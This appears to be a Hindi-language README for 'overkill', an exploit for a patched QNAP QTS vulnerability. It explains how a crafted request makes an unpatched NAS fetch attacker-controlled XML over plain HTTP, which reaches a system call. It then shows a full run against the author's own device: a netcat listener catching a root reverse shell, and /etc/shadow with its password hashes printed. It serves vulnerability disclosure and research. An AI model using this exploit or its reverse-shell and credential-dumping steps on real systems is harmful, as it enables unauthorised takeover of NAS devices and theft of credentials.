
QNAP N-Day (शायद CVE-2020-2509 नहीं)
ओवरकिल एक पैच की गई कमजोरी के लिए एक शोषण है जो QNAP QTS को प्रभावित करती है। QNAP द्वारा कमजोरियों के खुलासे के तरीके के कारण, मुझे यकीन नहीं है कि इस समस्या का कोई CVE है या नहीं। हालाँकि, इसे संभवतः नवंबर 2020 और अप्रैल 2021 में पैच किया गया था। n-day को CVE-2020-2509 के लिए अंतर विश्लेषण करते समय "खोजा" गया था। यह लगभग निश्चित रूप से CVE-2020-2509 नहीं है।
शोषण /cgi-bin/qnapmsg.cgi?lang=xxx को HTTP GET अनुरोध भेजेगा, जिससे बिना पैच वाले QNAP उपकरण असुरक्षित HTTP के माध्यम से update.qnap.com से एक XML फ़ाइल डाउनलोड करेंगे। एक हमलावर जो update.qnap.com को अपने पास रीडायरेक्ट कर सकता है, वह हमलावर-नियंत्रित XML फ़ाइल के साथ जवाब दे सकता है। जब QNAP XML फ़ाइल को पार्स करता है, तो यह कुछ सामग्री को system कॉल में पास करेगा, जिसके परिणामस्वरूप एक रिवर्स शेल प्राप्त होता है।
यह शोषण update.qnap.com अनुरोधों को शोषण की ओर निर्देशित करने की विधि को लागू नहीं करता है। नीचे दिए गए उदाहरण में, मैं अपने स्वयं के राउटर पर राउटर DNS हाईजैकिंग का उपयोग कर रहा था... आपकी माइलेज भिन्न हो सकती है।
albinolobster@ubuntu:~/overkill$ sudo python3 overkill.py --rhost 10.12.70.251 --lhost 10.12.70.252
01001001001000000110001101100001011011100010011101110100001000000110011101100101
______ ___ ___ _______ _______ __ ___ __ ___ ___
/ " \|" \ /" |/" "| /" \ |/"| / ") |" \ |" | |" |
// ____ \\ \ // /(: ______)|: |(: |/ / || | || | || |
/ / ) :)\\ \/. ./ \/ | |_____/ )| __/ |: | |: | |: |
(: (____/ // \. // // ___)_ // / (// _ \ |. | \ |___ \ |___
\ / \\ / (: "||: __ \ |: | \ \ /\ |\( \_|: \( \_|: \
\"_____/ \__/ \_______)|__| \___)(__| \__)(__\_|_)\_______)\_______)
01110100001000000111010001101111001000000111001101101100011001010110010101110000
🦞 jbaines-r7
[+] Forking a netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Spinning up HTTP server
[!] Attempting http://10.12.70.251:8080/cgi-bin/qnapmsg.cgi?lang=eng
[+] Received an HTTP request from 10.12.70.251 on 27/Jul/2022 11:58:23
[*] Requested /loginad//qnapmsg_eng.xml
10.12.70.251 - - [27/Jul/2022 11:58:23] "GET /loginad//qnapmsg_eng.xml HTTP/1.1" 200 -
Connection received on 10.12.70.251 44630
bash-3.2# uname -a
uname -a
Linux NAS4A32F3 4.2.8 #1 SMP Sun Nov 8 01:50:48 CST 2020 aarch64 GNU/Linux
bash-3.2# id
id
uid=0(admin) gid=0(administrators)
bash-3.2# cat /etc/shadow
cat /etc/shadow
admin:!$1$5pFeLUat$D8jTQogWJy0HF3XjkD13q/:19181:0:99999:7:::
guest:$1$$ysap7EeB9ODCrO46Psdbq/:14233:0:99999:7:::
httpdusr:!:19181:0:99999:7:::
albinolobster:$1$cZCC65z5$NXtIBB4hgqzVG.PHyShKh1:19195:0:99999:7:::
[sshd]:https://raw.githubusercontent.com/jbaines-r7/overkill/main/!:19181:0:99999:7:::
bash-3.2# exit